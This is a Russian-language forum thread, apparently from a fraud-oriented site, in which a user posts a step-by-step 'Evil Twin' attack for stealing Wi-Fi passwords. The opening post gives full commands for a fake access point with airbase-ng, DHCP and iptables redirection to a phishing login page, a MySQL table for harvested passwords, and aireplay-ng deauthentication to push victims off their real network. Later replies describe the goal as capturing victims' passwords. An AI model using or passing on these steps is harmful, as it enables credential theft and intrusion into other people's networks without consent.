1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Evil Twin method.

Тема в разделе "Чужие", создана пользователем 220V, 6 апр 2014.

  1. TopicStarter Overlay
    220V

    220V

    Регистрация:
    13 мар 2014
    Сообщения:
    41
    Симпатии:
    40
    EVIL TWIN - атака wi-fi точки доступа для получения пароля путем создания фейка с идентичным essid. И так приступим....

    Заходим в MySql:

    mysql -u root -p

    Пароль по умолчанию в backtrack user/pass - root/toor

    Создаем БД:
    create database wpa2;


    use wpa2;
    create table content(key1 VARCHAR(64), key2 VARCHAR(64));

    Запускаем apache и mysql service и проверяем работоспособность, перед этим копируем ниже вложеные файлы в var/www/ (делал под себя index.html (tp-link)).

    Устанавливаем dhcp3 и создаем config файл:
    apt-get install dhcp3-server -y
    mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
    gedit /etc/dhcp3/dhcpd.conf
    /etc/dhcp3/dhcpd.conf:
    -hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }

    Создаем FakeAP:
    airmon-ng start wlan0 [канал атакуемой точки]
    airbase-ng -e "Имя точки" -c [канал] mon0

    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    /etc/init.d/dhc1p3-server start

    Iptables:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    echo 1 > /proc/sys/net/ipv4/ip_forward

    Перенапрявляем:
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
    iptables -t nat -A POSTROUTING -j MASQUERADE

    Отключаем клиента и ждем коннекта к нашей фейковой точки:
    aireplay-ng -0 0 -a [target bssid] [monitor interface]

    Видео для наглядности:
     

    Вложения:

    • tplink.rar
      Размер файла:
      743,6 КБ
      Просмотров:
      5
    • Like Like x 8
    Метки:
  2. Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    409
    Симпатии:
    373
    Ты бы расписал что делается через black track.......
    Ведь люде есть и глупые.....
     
    • Like Like x 1
  3. TopicStarter Overlay
    220V

    220V

    Регистрация:
    13 мар 2014
    Сообщения:
    41
    Симпатии:
    40
    BackTrack сейчас уже Kali linux - дистрибутивы для тестирования систем на проникновение.
     
  4. Agulzex

    Agulzex

    Регистрация:
    23 окт 2012
    Сообщения:
    409
    Симпатии:
    373
    отредактируй полнстью свой пост....... как и что пошагово..... ведь тут не все знают что да как.....;)
    ну кто в теме тот знает что Kali linux
     
  5. BoberMod

    BoberMod Временно недоступен

    Регистрация:
    11 окт 2013
    Сообщения:
    571
    Симпатии:
    539
    Этим же способом можно и защиту WPA2-PSK взломать?
     
  6. TopicStarter Overlay
    220V

    220V

    Регистрация:
    13 мар 2014
    Сообщения:
    41
    Симпатии:
    40
    ок. доберусь до компа подрихтую, чтобы всем понятно было:)
    --- добавлено: 6 апр 2014 в 21:09 ---
    wpa2-psk тоже можно. Суть здесь в том, что мы создаем фейковую точку доступа с именем точки жертвы, глушим точку жертвы, ждем коннект на фейк и делаем редирект на свою страничку с требование ввести пароль для доступа в инет. жертва вводит пароль он сохраняется в нашей бд mysql.
     
    • Like Like x 4
  7. BoberMod

    BoberMod Временно недоступен

    Регистрация:
    11 окт 2013
    Сообщения:
    571
    Симпатии:
    539
    Help me! (Kali linux)
    Ввожу:
    create database wpa2;
    Ответ:
    bash: create: команда не найдена
    Что делать?
     
  8. TopicStarter Overlay
    220V

    220V

    Регистрация:
    13 мар 2014
    Сообщения:
    41
    Симпатии:
    40
    эта команда создает бд в mysql и для этого необходимо сначала зайти в mysql. p.s этот метод требует хотя бы минимального понимания того, что делаешь... копи/паст здесь не проходит. в таком случае лучше использовать pwnstar script, там все по пунктам.
     

Поделиться этой страницей

Загрузка...